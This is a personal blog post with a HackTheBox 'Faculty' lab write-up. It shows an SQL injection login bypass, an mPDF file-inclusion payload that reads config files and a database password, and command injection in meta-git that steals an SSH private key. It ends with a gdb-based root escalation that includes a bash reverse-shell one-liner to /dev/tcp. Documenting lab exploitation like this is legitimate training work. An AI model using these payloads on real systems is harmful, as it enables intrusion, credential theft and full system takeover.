<!doctype html><html lang=en><head><title>Faculty write-up (HackTheBox) · HOME</title><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1"><meta name=color-scheme content="light dark"><meta name=author content="Khaled Ngm"><meta name=description content="Faculty write-up HackTheBox Link to heading 1. Port Scan Enumuration Link to heading 2. Directory Fuzzing Link to heading 3. Exploitation Link to heading 4. Privilege Escalation Link to heading USER Link to heading ROOT Link to heading Port Scan (Nmap) Link to heading First We will scan target with nmap nmap -sV -sC 10.10.11.169 I found two open ports ssh and http Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-13 15:19 EDT Nmap scan report for faculty."><meta name=keywords content="Red Team ,blog,pentester,penetration testesr,hacking"><meta name=twitter:card content="summary"><meta name=twitter:title content="Faculty write-up (HackTheBox)"><meta name=twitter:description content="Faculty write-up HackTheBox Link to heading 1. Port Scan Enumuration Link to heading 2. Directory Fuzzing Link to heading 3. Exploitation Link to heading 4. Privilege Escalation Link to heading USER Link to heading ROOT Link to heading Port Scan (Nmap) Link to heading First We will scan target with nmap nmap -sV -sC 10.10.11.169 I found two open ports ssh and http Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-13 15:19 EDT Nmap scan report for faculty."><meta property="og:title" content="Faculty write-up (HackTheBox)"><meta property="og:description" content="Faculty write-up HackTheBox Link to heading 1. Port Scan Enumuration Link to heading 2. Directory Fuzzing Link to heading 3. Exploitation Link to heading 4. Privilege Escalation Link to heading USER Link to heading ROOT Link to heading Port Scan (Nmap) Link to heading First We will scan target with nmap nmap -sV -sC 10.10.11.169 I found two open ports ssh and http Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-13 15:19 EDT Nmap scan report for faculty."><meta property="og:type" content="article"><meta property="og:url" content="https://khaledngm11.github.io/posts/faculty/"><meta property="article:section" content="posts"><meta property="article:published_time" content="2022-10-14T00:00:00+00:00"><meta property="article:modified_time" content="2022-10-14T00:00:00+00:00"><link rel=canonical href=https://khaledngm11.github.io/posts/faculty/><link rel=preload href="/fonts/forkawesome-webfont.woff2?v=1.2.0" as=font type=font/woff2 crossorigin><link rel=stylesheet href=/css/coder.min.c4d7e93a158eda5a65b3df343745d2092a0a1e2170feeec909b8a89443903c6a.css integrity="sha256-xNfpOhWO2lpls980N0XSCSoKHiFw/u7JCbiolEOQPGo=" crossorigin=anonymous media=screen><link rel=stylesheet href=/css/coder-dark.min.39e41a7f16bdf8cb16e43cae7d714fa1016f1d2d2898a5b3f27f42c9979204e2.css integrity="sha256-OeQafxa9+MsW5DyufXFPoQFvHS0omKWz8n9CyZeSBOI=" crossorigin=anonymous media=screen><link rel=icon type=image/png href=/images/favicon-32x32.png sizes=32x32><link rel=icon type=image/png href=/images/favicon-16x16.png sizes=16x16><link rel=apple-touch-icon href=/images/apple-touch-icon.png><link rel=apple-touch-icon sizes=180x180 href=/images/apple-touch-icon.png><link rel=manifest href=/site.webmanifest><link rel=mask-icon href=/images/safari-pinned-tab.svg color=#5bbad5><meta name=generator content="Hugo 0.104.3"></head><body class="preload-transitions colorscheme-auto"><div class=float-container><a id=dark-mode-toggle class=colorscheme-toggle><i class="fa fa-adjust fa-fw" aria-hidden=true></i></a></div><main class=wrapper><nav class=navigation><section class=container><a class=navigation-title href=/>HOME</a>
<input type=checkbox id=menu-toggle>
<label class="menu-button float-right" for=menu-toggle><i class="fa fa-bars fa-fw" aria-hidden=true></i></label><ul class=navigation-list><li class=navigation-item><a class=navigation-link href=/about/>About</a></li><li class=navigation-item><a class=navigation-link href=/posts/>Writeups</a></li><li class=navigation-item><a class=navigation-link href=/contact/>Contact me</a></li><li class="navigation-item menu-separator"><span>|</span></li><li class=navigation-item><a href=https://khaledngm11.github.io/pt-br/></a></li></ul></section></nav><div class=content><section class="container post"><article><header><div class=post-title><h1 class=title><a class=title-link href=https://khaledngm11.github.io/posts/faculty/>Faculty write-up (HackTheBox)</a></h1></div><div class=post-meta><div class=date><span class=posted-on><i class="fa fa-calendar" aria-hidden=true></i>
<time datetime=2022-10-14T00:00:00Z>October 14, 2022</time></span>
<span class=reading-time><i class="fa fa-clock-o" aria-hidden=true></i>
4-minute read</span></div></div></header><div><h1 id=faculty-write-up-hackthebox>Faculty write-up HackTheBox
<a class=heading-link href=#faculty-write-up-hackthebox><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h1><p><img src=/images/faculty.png alt=faculty></p><h3 id=1-port-scan-enumuration>1. Port Scan Enumuration
<a class=heading-link href=#1-port-scan-enumuration><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h3><h3 id=2-directory-fuzzing>2. Directory Fuzzing
<a class=heading-link href=#2-directory-fuzzing><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h3><h3 id=3-exploitation>3. Exploitation
<a class=heading-link href=#3-exploitation><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h3><h3 id=4-privilege-escalation>4. Privilege Escalation
<a class=heading-link href=#4-privilege-escalation><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h3><ul><li><h3 id=user>USER
<a class=heading-link href=#user><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h3></li><li><h3 id=root>ROOT
<a class=heading-link href=#root><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h3></li></ul><h2 id=port-scan-nmap>Port Scan (Nmap)
<a class=heading-link href=#port-scan-nmap><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h2><ul><li>First We will scan target with nmap <code>nmap -sV -sC 10.10.11.169</code></li><li>I found two open ports <code>ssh</code> and <code>http</code></li></ul><div class=highlight><pre tabindex=0 style=background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-13 15:19 EDT
</span></span><span style=display:flex><span>Nmap scan report for faculty.htb (10.10.11.169)
</span></span><span style=display:flex><span>Host is up (0.20s latency).
</span></span><span style=display:flex><span>Not shown: 998 closed tcp ports (conn-refused)
</span></span><span style=display:flex><span>PORT   STATE SERVICE VERSION
</span></span><span style=display:flex><span>22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
</span></span><span style=display:flex><span>| ssh-hostkey: 
</span></span><span style=display:flex><span>|   3072 e9:41:8c:e5:54:4d:6f:14:98:76:16:e7:29:2d:02:16 (RSA)
</span></span><span style=display:flex><span>|   256 43:75:10:3e:cb:78:e9:52:0e:eb:cf:7f:fd:f6:6d:3d (ECDSA)
</span></span><span style=display:flex><span>|_  256 c1:1c:af:76:2b:56:e8:b3:b8:8a:e9:69:73:7b:e6:f5 (ED25519)
</span></span><span style=display:flex><span>80/tcp open  http    nginx 1.18.0 (Ubuntu)
</span></span><span style=display:flex><span>| http-cookie-flags: 
</span></span><span style=display:flex><span>|   /: 
</span></span><span style=display:flex><span>|     PHPSESSID: 
</span></span><span style=display:flex><span>|_      httponly flag not set
</span></span><span style=display:flex><span>|_http-server-header: nginx/1.18.0 (Ubuntu)
</span></span><span style=display:flex><span>| http-title: School Faculty Scheduling System
</span></span><span style=display:flex><span>|_Requested resource was login.php
</span></span><span style=display:flex><span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
</span></span><span style=display:flex><span>Nmap done: 1 IP address (1 host up) scanned in 26.91 seconds
</span></span></code></pre></div><h2 id=directory-fuzzing>Directory Fuzzing
<a class=heading-link href=#directory-fuzzing><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h2><p>I started to Fuzz directory using diresearch using
<code>python3 dirsearch.py -u http://faculty.htb</code></p><p>I have found these directories .</p><div class=highlight><pre tabindex=0 style=background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>Target: http://faculty.htb/
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>[15:22:15] Starting: 
</span></span><span style=display:flex><span>[15:22:38] 301 -  178B  - /admin  -&gt;  http://faculty.htb/admin/             
</span></span><span style=display:flex><span>[15:22:39] 302 -   14KB - /admin/  -&gt;  login.php                            
</span></span><span style=display:flex><span>[15:22:39] 302 -   14KB - /admin/?/login  -&gt;  login.php                     
</span></span><span style=display:flex><span>[15:22:39] 200 -    3KB - /admin/home.php                                   
</span></span><span style=display:flex><span>[15:22:39] 200 -   17B  - /admin/download.php                               
</span></span><span style=display:flex><span>[15:22:39] 200 -    5KB - /admin/login.php                                  
</span></span><span style=display:flex><span>[15:22:39] 302 -   14KB - /admin/index.php  -&gt;  login.php                   
</span></span><span style=display:flex><span>[15:23:06] 200 -    3KB - /header.php                                       
</span></span><span style=display:flex><span>[15:23:08] 302 -   12KB - /index.php  -&gt;  login.php                         
</span></span><span style=display:flex><span>[15:23:12] 200 -    5KB - /login.php                                        
</span></span><span style=display:flex><span>[15:23:37] 500 -    0B  - /test.php  
</span></span></code></pre></div><h2 id=exploitation>Exploitation
<a class=heading-link href=#exploitation><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h2><ul><li>lets navigate into <code>http://faculty.htb/admin/login</code></li><li>I tried to inject input with single qoute and I got this error .</li></ul><p><img src=/images/admin.png alt=admin></p><ul><li><p>I saved this path as draft <code>/var/www/scheduling/admin/admin_class.php</code></p></li><li><p>I used this payload to login as admin <code>admin'or 1=1#</code> and this was successful .</p></li><li><p>After a minuites of checking functions I found <strong>download</strong> button at <strong>Faculty list</strong> that use <strong>MPDF library</strong> that convert html to pdf file .</p></li><li><p>After a minutes of enum I found that it&rsquo;s affected with local file inclusion check <a href=https://www.exploit-db.com/exploits/50995>here</a> .</p></li><li><p>I decoded this payload <code>&lt;annotation file="/var/www/scheduling/admin/admin_class.php" content="" icon="Graph" title="Attached File: " pos-x="195" /></code>
to urlencode then base64 and replaced it with burp proxy and I checkded file content that contain <code>db_connect.php</code>.</p></li><li><p>I repeated this step to get db password .</p><p><img src=/images/chef.png alt=chef></p></li><li><p>pass > Co.met06aci.dly53ro.per</p></li><li><p>I also read <code>/etc/passwd</code> and I got 2 users</p></li></ul><div class=highlight><pre tabindex=0 style=background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>gbyolo
</span></span><span style=display:flex><span>developer
</span></span></code></pre></div><ul><li>Lets try to connect to gbyolo using ssh <code>ssh gbyolo@10.10.11.169</code> with <code>Co.met06aci.dly53ro.per</code> password &mldr; success ! .</li></ul><h2 id=privilege-escalation-user>Privilege Escalation (User)
<a class=heading-link href=#privilege-escalation-user><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h2><ul><li>I used <code>sudo -l</code> command to see if this user can run any command with high priv .</li></ul><div class=highlight><pre tabindex=0 style=background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>-bash-5.0$ sudo -l
</span></span><span style=display:flex><span>[sudo] password for gbyolo: 
</span></span><span style=display:flex><span>Matching Defaults entries for gbyolo on faculty:
</span></span><span style=display:flex><span>    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>User gbyolo may run the following commands on faculty:
</span></span><span style=display:flex><span>    (developer) /usr/local/bin/meta-git
</span></span></code></pre></div><ul><li><p>If we take a look , we see that gbyolo can run meta-git as developer and I found <a href=https://hackerone.com/reports/728040>RCE</a> for meta-git module we can use to esclate our priv .</p></li><li><p>lets run module as developer user <code>sudo -u developer meta-git clone 'ngm||whoami'</code> .
<img src=/images/git.png alt=meta-git></p></li><li><p>We can now get ssh key that located at <code>~/.ssh/id_rsa</code> using command <code>sudo -u developer meta-git clone 'ngm||cat ~/.ssh/id_rsa'</code> , I copied ssh key to <code>dev.key</code> with permission <code>chmod 600 dev.key</code>.</p></li><li><p>I used <code>ssh -i dev.key developer@10.10.11.169</code> to login ssh .</p></li></ul><h2 id=privilege-escalation-root>Privilege Escalation (Root)
<a class=heading-link href=#privilege-escalation-root><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h2><ul><li>First I executed <a href=https://github.com/topics/linpeas>linpeas.sh</a> script that search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts .</li><li>I have found files belongs to root annd readable by beveloper user .
<img src=/images/linpeas.png alt=linpeas></li><li>then I tried to a process that’s run by root and also has the system context then I found that <code>python3</code> running with <code>pid 710</code> .</li><li>I attached process to gdb using <code>gdb -p 710</code> command .</li><li>Lets call system context and run commands with high privileges .</li><li>You won’t be able to see the output of the command executed but it will be executed by that process (so get a rev shell) using <code>call (void)system("bash -c 'bash -i >& /dev/tcp/{host}/{port} 0>&1'")</code> or you can give SUID permission to <code>/bin/bash</code> using <code>call (void)system("chmod u+s /bin/bash")</code> then <code>bash -p</code> , now we are root .</li></ul><h1 id=thanks>Thanks
<a class=heading-link href=#thanks><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h1></div><footer></footer></article></section></div><footer class=footer><section class=container>©
2022
Khaled Ngm
·
Powered by <a href=https://gohugo.io/>Hugo</a> & <a href=https://github.com/luizdepra/hugo-coder/>Coder</a>.</section></footer></main><script src=/js/coder.min.236049395dc3682fb2719640872958e12f1f24067bb09c327b233e6290c7edac.js integrity="sha256-I2BJOV3DaC+ycZZAhylY4S8fJAZ7sJwyeyM+YpDH7aw="></script></body></html>